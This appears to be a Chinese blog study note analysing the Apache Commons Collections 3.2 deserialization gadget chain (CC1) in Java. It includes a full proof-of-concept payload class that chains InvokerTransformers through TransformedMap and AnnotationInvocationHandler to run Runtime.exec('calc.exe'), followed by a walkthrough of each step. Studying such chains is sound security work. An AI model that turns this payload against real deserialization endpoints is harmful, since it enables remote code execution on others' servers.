- 1会Python的大学生,毕业后有多赚?_只会python大学毕业
- 2Vue - 实现文件导出&文件保存下载_vue 下载文件流
- 3【C++】文件IO流_c++ 文件io
- 4PIVOT函数与UNPIVOT函数的运用
- 5ubuntu_qtcreator安装_qtcreater安装 源
- 6关系型数据库, NoSQL 数据库, NewSQL 数据库权威整理_对比分析关系数据库,newsql数据库,nosql数据库的联系
- 7算法与数据结构-堆的基本操作C语言实现_堆及其操作 c语言
- 8开源协议的对比和商业上的安全使用_sspl特点
- 9香橙派Kunpeng Pro开箱测评:入门体验使用与基础测试_香橙派 面试
- 101+x_大数据应用开发(python)职业技能(中级)_1+x证书泰迪大数据应用开发(python)职业技能等级证书考什么
Java安全研究——反序列化漏洞之CC链
赞
踩
0x01前言
apache commons-collections组件下的反序列化漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc链的学习总结,如有错误还请大佬指出。
若本文有侵权行为,请立即私信,将全面修正。
0x02漏洞环境
JDK1.8
Apache Commons Collections 3.2版本
0x03反序列化漏洞
序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,就是将对象转换成另一种形式,以方便跨平台存储和网络传输。
反序列化则是将上述过程反过来进行的操作。
在Java中任何一个对象必须要实现Serializable接口才可以执行序列化和反序列化操作。
反序列化漏洞成因:Java对象在数据的传输过程中,是以序列化的的数据进行传输,当传输至服务端时进行反序列化操作时,会调用被反序列化对象的readObject()方法。若该类重写了readObject()方法,存在一些危险操作,便会开始执行。
0x04对CC链的研究和复现
在分析前,先看一下大佬的payload,接下来一步步分析
- package com.example;
- import org.apache.commons.collections.Transformer;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.map.TransformedMap;
- import java.io.*;
- import java.lang.annotation.Target;
- import java.lang.reflect.Constructor;
- import java.lang.reflect.Method;
- import java.util.HashMap;
- import java.util.Map;
-
- public class App implements Serializable {
-
- public static void main(String[] args) throws Exception{
- //transformers: 一个transformer链,包含各类transformer对象(预设转化逻辑)的转化数组
- Transformer[] transformers = new Transformer[]{
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
- new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
- new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
- };
-
- //transformedChain: ChainedTransformer类对象,传入transformers数组,可以按照transformers数组的逻辑执行转化操作
- Transformer transformerChain = new ChainedTransformer(transformers);
-
- //Map数据结构,转换前的Map,Map数据结构内的对象是键值对形式,类比于python的dict
- Map map = new HashMap();
- map.put("value", "test");
-
- //Map数据结构,转换后的Map
- /*
- TransformedMap.decorate方法,预期是对Map类的数据结构进行转化,该方法有三个参数。
- 第一个参数为待转化的Map对象
- 第二个参数为Map对象内的key要经过的转化方法(可为单个方法,也可为链,也可为空)
- 第三个参数为Map对象内的value要经过的转化方法。
- */
- //TransformedMap.decorate(目标Map, key的转化对象(单个或者链或者null), value的转化对象(单个或者链或者null));
- Map transformedMap = TransformedMap.decorate(map, null, transformerChain);
-
- //反射机制调用AnnotationInvocationHandler类的构造函数
- //forName 获得类名对应的Class对象
- Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
- //通过反射调用私有的的结构:私有方法、属性、构造器
- //指定构造器
-
- Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
- //取消构造函数修饰符限制,保证构造器可访问
- ctor.setAccessible(true);
-
- //获取AnnotationInvocationHandler类实例
- //调用此构造器运行时类的对象
- Object instance=ctor.newInstance(Target.class, transformedMap);
-
- //序列化
- FileOutputStream fileOutputStream = new FileOutputStream("serialize.txt");
- ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
- objectOutputStream.writeObject(instance);
- objectOutputStream.close();
-
- //反序列化
- FileInputStream fileInputStream = new FileInputStream("serialize.txt");
- ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
- Object result = objectInputStream.readObject();
- objectInputStream.close();
- System.out.println(result);
- }
- }
1)Tranformer接口
通过对大佬文章的学习,漏洞主要运用ChainedTransformer、ConstantTransformer、InvokerTransformer这三个类。这三个类都是实现了Transformer接口的类,该接口包含了一个transform方法,以使每个实现了该接口的类可以进行固定类型的转化。
- package org.apache.commons.collections;
- public interface Transformer {
-
-
- public Object transform(Object input);
-
- }
ConstantTransformer类的transform方法
该类中的transform方法:接受一个对象返回一个常量,无论接收什么对象都返回 iConstant。
InvokerTransformer类中的transform方法
该类中的transform方法:接收一个对象,通过Java的反射机制获取该对象的运行时类和方法,并进行反射调用。其中方法值、参数等均是可控的。
ChainedTransformer类中的transform方法
该类 中的transform方法:当传入的是一个数组时候,开始循环读取,对每个参数都会调用transform方法,并将前一个对象的transform方法的返回值,当作下一个对象的transfrom方法的参数值进行调用。
到目前为止,我们先对payload的核心利用链进行分析
a)这是一个构造好的Transformer数组,包含三个上面所提到的类的对象
b)new一个ChainedTransformer类的对象,将transformer数组传入。经过ChainedTransformer把数组中的类链接到一起,构成调用链。
c)此时直接调用transformerChain的transform方法便可以执行。简单说一下过程:
首先得到Runtime.class,接着通过反射调用获取到Runtime.getRuntime( ),此时并未开始执行,随后通过invoke方法将Runtime.getRuntime( )唤醒执行,得到了Runtime实例对象,最后获取到Runtime实例的exec方法,并执行calc.exe。
注:详情请见大佬文章Java反序列化漏洞分析 - FreeBuf网络安全行业门户
2)TransformedMap类
在1)上讲解了不同的实现了Tranformer接口的类中transform方法的链式执行,这只是我们手动去写代码进行执行。而该cc链要如何利用?从1)中的核心链执行结果来看,就是要找到ChainedTransformer类中的transform方法在哪里被调用了,然后继续寻找上层的调用,最终寻找到readObject方法。
a)TransformedMap类中 checkSetValue 中调用了 transform 方法
看一下他的构造函数
接收一个Map,并将keyTransformer、valueTransformer进行赋值,但是构造方法是protected类型。
b)向上寻找,找到了decorate方法,返回一个可以自定义的TransformedMap类
3)AbstractInputCheckedMapDecorator类
这里面的静态内部类MapEntry的setValue方法调用了2)中 checkSetValue方法,同时TransformedMap类是AbstractInputCheckedMapDecorator类的子类,再去寻找其父类
有一个点:TransformedMap类继承于-->AbstractInputCheckedMapDecorator.MapEntry类继承于-->AbstractMapEntryDecorator类实现了-->Map.Entry接口,因此我们便可以利用Map来使代码执行。
也就是payload中的
4)AnnotationInvocationHandler类
这里需要导入sun包源码,方便调试,导入方法大佬们应该都会,我就不写了
源码下载地址:jdk8u/jdk8u/jdk: af660750b2f4
继续寻找上层的调用函数,去寻找哪个方法调用了setValue方法,AnnotationInvocationHandler类中的readObject方法调用了setValue方法,终于找到了readObject方法,这正是我们想要的。
看一下readObject方法代码,发现了setValue方法。
看一下构造函数,这个Map我们可以控制,可以利用我们上面构造好的map。
5)序列化和反序列化
payload最后这部分就很简单了,获取AnnotationInvocationHandler类的对象并将我们构造好的transformedMap传入,反序列化之后,就会造成反序列化漏洞。
0x05结束语
开始研究Java安全,有一个星期左右,狂补各种Java基础和开发基础,也仅仅是做了一个学习笔记,以后自己可以翻看。
用了三天时间,参考各类大佬的文章,终于搞懂了CC链。本文也是简单分析了CC链的过程,比较浅显,尚有不足,很多细节还需要去学习。
参考链接:
Java安全入门(二)——CC链1 分析+详解_ErYao7的博客-CSDN博客
Java反序列化漏洞分析 - FreeBuf网络安全行业门户
